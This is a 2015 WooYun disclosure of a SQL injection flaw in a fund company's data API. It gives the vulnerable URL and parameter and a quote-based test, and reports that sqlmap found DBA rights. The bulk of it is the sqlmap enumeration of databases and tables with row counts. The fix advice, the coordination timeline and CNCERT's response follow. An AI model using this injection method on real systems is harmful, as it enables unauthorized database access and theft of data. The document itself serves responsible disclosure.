当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0140841

漏洞标题:万银财富基金某重要分站存在SQL注入(DBA权限+几千万敏感信息泄漏)

相关厂商:万银财富

漏洞作者: 路人甲

提交时间:2015-09-15 14:39

修复时间:2015-11-01 15:56

公开时间:2015-11-01 15:56

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-09-15: 细节已通知厂商并且等待厂商处理中
2015-09-17: 厂商已经确认,细节仅向厂商公开
2015-09-27: 细节向核心白帽子及相关领域专家公开
2015-10-07: 细节向普通白帽子公开
2015-10-17: 细节向实习白帽子公开
2015-11-01: 细节向公众公开

简要描述:

存在SQL注入,为DBA权限,可致几千万敏感信息泄漏

详细说明:

在测试过程中,抓包得到一个地址
http://data.wy-fund.com/api.php?op=getsameindex&indexid=885001

0-0.jpg


测试
http://data.wy-fund.com/api.php?op=getsameindex&indexid=885001'

0-1.jpg


发现两个界面不一样。indexid存在注入。
这些数据干什么的呢?不会泄漏出什么信息吧?
直接上sqlmap测试吧,可以发现是DBA权限,而且有上千万的数据信息!~~~

1.jpg


2.jpg


3.jpg


4.jpg


5.jpg


6.jpg


7.jpg


这些信息就不继续测试了!~~~

available databases [6]:
[*] caihui
[*] caihui1
[*] cqgd
[*] information_schema
[*] mysql
[*] performance_schema
Database: caihui1
+-----------------------------+---------+
| Table | Entries |
+-----------------------------+---------+
| cihdquote | 12172659 |
| etfcrstocks | 10143050 |
| newstype | 9003508 |
| chdquote | 8853576 |
| chdquote_copy | 8018850 |
| cihdquote_copy | 7231993 |
| newsindus | 6946815 |
| newsfin | 3851068 |
| fundbdy | 2605306 |
| nav | 2211012 |
| dernav | 2210817 |
| encurnav_der | 2205481 |
| newsauth | 1606726 |
| fhdquote | 1528331 |
| tab_comp_ma | 1515590 |
| tab_comp_macd | 1515590 |
| tab_comp_rsi | 1515590 |
| tab_comp_temp_kdj_lh | 1515590 |
| tab_comp_temp_lh | 1515590 |
| tab_comp_kdj | 1484053 |
| sholding | 1209250 |
| profchg | 944152 |
| sholding_s | 882554 |
| iport | 637662 |
| itprofile | 536543 |
| dispara_fund | 502629 |
| `itprofile-20140614` | 471439 |
| iport_s | 467840 |
| chgrf_f | 448683 |
| finfo | 396251 |
| nav_cur | 391090 |
| curnav_der | 388823 |
| uplog | 376388 |
| lfshare | 336837 |
| tstat | 259997 |
| `finfo--` | 257218 |
| fparty | 254925 |
| temp_stock_list_jj | 210589 |
| bsholding | 176373 |
| benchmark_comparison | 141219 |
| scfp_new | 127732 |
| symbol_comp | 103747 |
| unicst_new | 101801 |
| newstext | 99915 |
| chgrf | 97491 |
| securitycode | 86094 |
| etfcrinfo | 77937 |
| `securitycode---` | 73742 |
| securitycode_copy | 73620 |
| chgrf_20141030 | 72602 |
| mfdhispd | 67056 |
| ntrad | 63208 |
| icst | 63085 |
| fratios | 62316 |
| scstc | 61189 |
| fundshare_chg | 59409 |
| qdshold | 54710 |
| fholder | 48682 |
| new_funds_index_wy | 47760 |
| fshare | 47305 |
| new_funds_index_wy_1121 | 46280 |
| fundtypes | 45954 |
| tradedate | 45580 |
| assetal | 44100 |
| new_funds_index_wy_2 | 43940 |
| new_funds_index_wy_4 | 43638 |
| new_funds_index_wy_3 | 43460 |
| wy_tab_gp_week | 35948 |
| p_record | 33645 |
| bsheet | 22569 |
| wy_tab_gp_mothlow | 21775 |
| scfp | 21541 |
| fholder_chg | 21511 |
| assetal_copy | 20929 |
| assetal_copy1 | 20929 |
| bsheet_new | 20413 |
| icst_new | 19581 |
| fundsta | 15409 |
| tab_fixedinvestment | 12456 |
| qdiport | 11778 |
| wy_tab_gp_week_h | 9864 |
| tab_symbol_rank | 9486 |
| fundmg | 9399 |
| jjtzbz | 9385 |
| tab_comp_ma_120 | 9369 |
| fund_diagnose_record | 9172 |
| fpchg | 8942 |
| temp_manager_performance | 8764 |
| dhistory | 7056 |
| csholding | 6872 |
| prizestate | 6512 |
| fcmg | 6491 |
| tab_comp_ma_120_bak | 6250 |
| temp_fundtype_wy | 5557 |
| wy_tab_gp_quarter | 5314 |
| avgrmmonf | 4870 |
| temp_stock_chg | 4453 |
| temp_stock_chg_jj | 4453 |
| temp_stock_chg_test | 4453 |
| jjzx | 4425 |
| mfdhistory | 4182 |
| temp_manager_performance_jj | 4149 |
| tab_comp_uplog | 4092 |
| fund_benchmark | 3925 |
| temp_gr_year | 3708 |
| jjglr | 3701 |
| jjtgr | 3697 |
| temp_buy_info | 3697 |
| temp_issue | 3697 |
| temp_main_fund | 3697 |
| ofip | 3638 |
| ofprofile | 3638 |
| qdfhold | 3547 |
| temp_info_new | 3542 |
| wycf_zq_temp_ph | 3542 |
| temp_asset | 3493 |
| temp_nav_ofund | 3152 |
| wycf_zq_temp_nav_ofund | 3152 |
| wycf_zq_temp_fhb | 3039 |
| temp_status | 3034 |
| tab_pzx | 2941 |
| tab_dxfzbj | 2927 |
| wycf_zq_howbuy_ph | 2863 |
| wy_tab_gp_symbol | 2553 |
| wycf_zq_howbuy_kfnav | 2479 |
| `ofprofile-20140604` | 2329 |
| temp_manager_new | 2197 |
| wycf_zq_sina_ph | 2000 |
| curfscode | 1912 |
| temp_issue_jj | 1777 |
| temp_nav_ofund_jj | 1767 |
| temp_info_new_jj | 1734 |
| risk_assessment_wy | 1703 |
| wycf_zq_nav | 1694 |
| wycf_zq_tt_ofund | 1685 |
| jjjj | 1492 |
| temp_manager_new_jj | 1466 |
| temp_status_jj | 1407 |
| fcowner | 1172 |
| dsmeeting | 1089 |
| tab_comp_symbol | 1089 |
| fundsaiv | 1063 |
| csrcappfin | 1055 |
| temp_bonus | 1040 |
| tab_recommendlog | 967 |
| ifundos | 922 |
| v9_symbols | 843 |
| dhistory_dispara | 838 |
| qdbhold | 690 |
| temp_bonus_jj | 669 |
| rating_wy | 636 |
| temp_split | 599 |
| cxfundname | 589 |
| itnews | 549 |
| tab_tg_jjtj | 520 |
| temp_nav_curfund | 485 |
| wycf_zq_temp_hb | 485 |
| wycf_zq_temp_nav_hbfund | 485 |
| temp_nav_strufund | 355 |
| fundda | 344 |
| wycf_zq_howbuy_fbnav | 333 |
| wycf_zq_howbuy_ph_hb | 333 |
| company_rating_wy | 298 |
| fundiconvert | 283 |
| fsmeeting | 246 |
| temp_nav_curfund_jj | 227 |
| tsmeeting | 224 |
| temp_split_jj | 210 |
| fcshare | 188 |
| tab_jmtj_mc | 156 |
| tab_jmtj_chang | 144 |
| wycf_zq_sina_hbfund | 140 |
| tab_gptj_mc | 112 |
| temp_nav_strufund_jj | 106 |
| temp_company_stat | 102 |
| tab_jmtj_duan | 93 |
| downstate | 89 |
| cfip | 88 |
| cfprofile | 59 |
| tab_gptj_chang | 55 |
| tab_invest_reinforcement | 51 |
| fegather | 48 |
| tab_jmtj_zhong | 46 |
| tab_invest_wave_band | 43 |
| tab_gptj_zhong | 41 |
| tab_gptj_duan | 38 |
| companycomm | 35 |
| companycomm_bak | 35 |
| jjxldy | 29 |
| temp_nav_cfund_jj | 22 |
| tablehy07051 | 19 |
| tablehy07052 | 19 |
| tablehy07053 | 19 |
| tablehy1 | 19 |
| tablehy2 | 19 |
| tablehy3 | 19 |
| temp_stock_list | 13 |
| temp_aa | 12 |
| table07051 | 10 |
| table07052 | 10 |
| table07053 | 10 |
| table1 | 10 |
| table2 | 10 |
| table3 | 10 |
| tablez1 | 10 |
| jjxljj | 9 |
| tab_jmtj | 9 |
| tab_tg_nxyj | 8 |
| cfunds_net_wy | 7 |
| tab_jmtj_mc_copy | 7 |
| tab_tg_jjyj | 7 |
| temp_nav_cfund | 7 |
| tablez07052 | 5 |
| tablez07053 | 5 |
| tablez3 | 5 |
| tablez07051 | 4 |
| wycf_zq_tttempzhishu | 3 |
| wycf_zq_zhishu | 3 |
| tab_tg_flmc | 2 |
| tab_comp_logrecorder | 1 |
| tab_new_jjld | 1 |
| temp_bb | 1 |
+-----------------------------+---------+

漏洞证明:

如上

修复方案:

过滤修复
权限限制

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:11

确认时间:2015-09-17 15:54

厂商回复:


CNVD确认并复现所述情况,已经转由CNCERT向证券业信息化主管部门通报,由其后续协调网站管理单位处置.

最新状态:

暂无